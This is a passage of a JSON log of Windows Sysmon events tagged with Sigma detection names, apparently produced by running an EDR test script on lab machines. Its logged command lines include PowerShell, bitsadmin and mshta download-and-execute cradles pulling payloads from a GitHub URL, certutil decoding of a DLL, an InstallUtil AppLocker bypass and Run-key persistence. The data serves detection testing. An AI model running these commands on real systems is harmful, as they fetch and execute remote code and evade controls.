11:43:45.116"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417083,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:45.120170Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","MS Office Product Spawning Exe in User Dir","Microsoft Office Product Spawning Windows Shell"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c ping 127.0.0.1&&del del /F /Q /A:H \"C:\\Users\\IEUser\\AppData\\Roaming\\wwlib.dll\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Users\\IEUser\\AppData\\Roaming\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.592 (WinBuild.160101.0800)","Hashes":"SHA1=E2EAD0993B917E1828A658ADA0B87E01D5B8424F,MD5=C43699F84A68608E7E57C43B7761BBB8,SHA256=2EDB180274A51C83DDF8414D99E90315A9047B18C51DFD070326214D4DA59651,IMPHASH=392B4D61B1D1DADC1F06444DF258188A","Image":"C:\\Windows\\SysWOW64\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-CA8D-5F8A-0000-0020D1090A00","LogonId":"0xa09d1","OriginalFileName":"Cmd.Exe","ParentCommandLine":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe --xStart","ParentImage":"C:\\Users\\IEUser\\AppData\\Roaming\\WINWORD.exe","ParentProcessGuid":"747F3D96-D8E5-5F8A-0000-0010E1BC7200","ParentProcessId":2920,"ProcessGuid":"747F3D96-D8F5-5F8A-0000-00106B6F7300","ProcessId":1680,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-10-17 11:43:49.217"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":417085,"Execution":{"#attributes":{"ProcessID":3500,"ThreadID":4688}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-10-17T11:43:49.229742Z"}},"Version":5}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-04-27 15:57:25.868","Image":"C:\\Windows\\Explorer.EXE","ProcessGuid":"365ABB72-7ACC-5CC4-0000-0010B2470300","ProcessId":2772,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\Downloads\\Flash_update.exe","UtcTime":"2019-04-27 15:57:25.868"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":6575,"Execution":{"#attributes":{"ProcessID":1912,"ThreadID":996}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-27T15:57:25.868863Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-04-27 15:57:53.634","Image":"C:\\Users\\IEUser\\Downloads\\Flash_update.exe","ProcessGuid":"365ABB72-7C01-5CC4-0000-00102B3E0C00","ProcessId":2680,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\NvSmart.exe","UtcTime":"2019-04-27 15:57:53.634"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":6579,"Execution":{"#attributes":{"ProcessID":1912,"ThreadID":996}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-27T15:57:53.650113Z"}},"Version":2}}}},{"detection":["UAC Bypass Abusing Winsat Path Parsing - File","UAC Bypass Using NTFS Reparse Point - File","UAC Bypass Using .NET Code Profiler on MMC","UAC Bypass Using MSConfig Token Modification - File"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2019-04-27 15:57:53.634","Image":"C:\\Users\\IEUser\\Downloads\\Flash_update.exe","ProcessGuid":"365ABB72-7C01-5CC4-0000-00102B3E0C00","ProcessId":2680,"RuleName":"","TargetFilename":"C:\\Users\\IEUser\\AppData\\Roaming\\NvSmartMax.dll","UtcTime":"2019-04-27 15:57:53.634"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":11,"EventRecordID":6581,"Execution":{"#attributes":{"ProcessID":1912,"ThreadID":996}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-27T15:57:53.650113Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","OceanLotus Registry Activity","UAC Bypass via Event Viewer"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"C:\\Users\\IEUser\\AppData\\Roaming\\svchost.exe","EventType":"SetValue","Image":"C:\\Users\\IEUser\\AppData\\Roaming\\NvSmart.exe","ProcessGuid":"365ABB72-7C01-5CC4-0000-0010F9530C00","ProcessId":2992,"RuleName":"technique_id=T1060,technique_name=Registry Run Keys / Start Folder","TargetObject":"HKU\\S-1-5-21-3583694148-1414552638-2922671848-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\360v","UtcTime":"2019-04-27 15:57:53.806"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":6593,"Execution":{"#attributes":{"ProcessID":1912,"ThreadID":996}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-04-27T15:57:53.884488Z"}},"Version":2}}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c certutil -f -decode fi.b64 AllTheThings.dll ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-660A-5D3F-0000-0010B9E08500","ProcessId":3184,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:32:58.614"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4888,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:32:58.659405Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Suspicious Certutil Command"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"certutil -f -decode fi.b64 AllTheThings.dll ","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"CertUtil.exe","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=459D928381CDDFDC31D03C3DA5C28E63B1190194,MD5=535CF1F8E8CF3382AB8F62013F967DD8,SHA256=85DD6F8EDF142F53746A51D11DCBA853104BB0207CDF2D6C3529917C3C0FC8DF,IMPHASH=683B8A445B00A271FC57848D893BD6C4","Image":"C:\\Windows\\System32\\certutil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c certutil -f -decode fi.b64 AllTheThings.dll ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-660A-5D3F-0000-0010B9E08500","ParentProcessId":3184,"ProcessGuid":"747F3D96-660A-5D3F-0000-0010FFF28500","ProcessId":700,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:32:58.940"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4890,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:32:59.234755Z"}},"Version":5}}}},{"detection":["Windows PowerShell Web Request"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c powershell -c \"Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-660F-5D3F-0000-001055378600","ProcessId":2948,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:03.238"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4893,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:03.254713Z"}},"Version":5}}}},{"detection":["Bitsadmin Download"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"bitsadmin.exe /transfer \"JobName\" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt \"C:\\Windows\\system32\\Default_File_Path.ps1\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"BITS administration utility","FileVersion":"7.8.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=5DEB6EC7BB9BD0C85BBE91CBFD92BDC774FE5F8A,MD5=5CD8838F1E275B0C8EADF4B755C04E4F,SHA256=03C7E317E277BBD6C9C1159F8718A9D302E6F78E0D80C09D52A994B7598C0F30,IMPHASH=B0A3CFF8CFDE112945189719F82F9EA9","Image":"C:\\Windows\\System32\\bitsadmin.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c bitsadmin.exe /transfer \"JobName\" https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt \"C:\\Windows\\system32\\Default_File_Path.ps1\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-660F-5D3F-0000-00109B328600","ParentProcessId":6020,"ProcessGuid":"747F3D96-660F-5D3F-0000-00100F4F8600","ProcessId":3896,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:03.667"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4894,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:03.886611Z"}},"Version":5}}}},{"detection":["Suspicious Bitsadmin Job via PowerShell","Windows PowerShell Web Request"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"powershell -c \"Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows PowerShell","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=6CBCE4A295C163791B60FC23D285E6D84F28EE4C,MD5=7353F60B1739074EB17C5F4DDDEFE239,SHA256=DE96A6E69944335375DC1AC238336066889D9FFC7D73628EF4FE1B1B160AB32C,IMPHASH=741776AACCFC5B71FF59832DCDCACE0F","Image":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c powershell -c \"Start-BitsTransfer -Priority foreground -Source https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt -Destination Default_File_Path.ps1","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-660F-5D3F-0000-001055378600","ParentProcessId":2948,"ProcessGuid":"747F3D96-660F-5D3F-0000-00106B508600","ProcessId":6720,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:03.695"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4895,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:03.966393Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6614-5D3F-0000-001093CE8600","ProcessId":108,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:08.174"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4897,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:08.202018Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":".NET Framework installation utility","FileVersion":"4.7.3190.0 built by: NET472REL1LAST_C","Hashes":"SHA1=1BEB7CDC82F57269A4AD123BE7F8B72F7F1B4630,MD5=7CCB088EEFBF464D0A467D0FF4C619DA,SHA256=0389427DA1D97388D89F28C2D856CD871FC200562C51749C6F6EF4FED9087FAE,IMPHASH=F34D5F2D4577ED6D9CEEC516C1F5A744","Image":"C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6614-5D3F-0000-001093CE8600","ParentProcessId":108,"ProcessGuid":"747F3D96-6614-5D3F-0000-0010BFD98600","ProcessId":5696,"Product":"Microsoft® .NET Framework","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:08.415"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4899,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:08.446374Z"}},"Version":5}}}},{"detection":["Possible Applocker Bypass"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\InstallUtil.exe /logfile= /LogToConsole=false /U AllTheThings.dll","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6619-5D3F-0000-0010FDE78600","ProcessId":5116,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:13.169"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4900,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:13.214691Z"}},"Version":5}}}},{"detection":["Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c mshta.exe javascript:a=GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct\").Exec();close();","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-661E-5D3F-0000-0010A3148700","ProcessId":776,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:18.241"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4902,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:18.286776Z"}},"Version":5}}}},{"detection":["Mshta JavaScript Execution","Suspicious Rundll32 Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"mshta.exe javascript:a=GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct\").Exec();close();","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Microsoft (R) HTML Application host","FileVersion":"11.00.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=DD8B22ACEA424823BB64ABF71F61A03D41177C38,MD5=F328FDCFF05BF02C2C986D52AED8BC2A,SHA256=E616C5CE71886652C13E2E1FA45A653B44D492B054F16B15A38418B8507F57C7,IMPHASH=42DA177DE2FAA97C3DFAEC9562772A7F","Image":"C:\\Windows\\System32\\mshta.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"cmd /c mshta.exe javascript:a=GetObject(\"script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Mshta_calc.sct\").Exec();close();","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-661E-5D3F-0000-0010A3148700","ParentProcessId":776,"ProcessGuid":"747F3D96-661E-5D3F-0000-00107F248700","ProcessId":3164,"Product":"Internet Explorer","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 21:33:18.451"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":4904,"Execution":{"#attributes":{"ProcessID":2640,"ThreadID":3476}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-07-29T21:33:18.583990Z"}},"Version":5}}}},{"detection":["Godmode Sigma Rule","Windows PowerShell Web Request"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"cmd /c powershell -c \"(New-Object Net.WebClient).DownloadFile('https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/CradleTest.txt','Default_File_Path.ps1');IEX((-Join([IO.File]::ReadAllBytes('Default_File_Path.ps1')|ForEach-Object{[Char]$_})))\"","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Windows Command Processor","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18","Image":"C:\\Windows\\System32\\cmd.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-6053-5D3F-0000-002082314100","LogonId":"0x413182","ParentCommandLine":"\"C:\\Windows\\System32\\cmd.exe\" /C \"C:\\ProgramData\\ssh\\runtests.bat\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-6609-5D3F-0000-00109FBF8500","ParentProcessId":1208,"ProcessGuid":"747F3D96-6623-5D3F-0000-001011F68700","ProcessId":5816,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2019-07-29 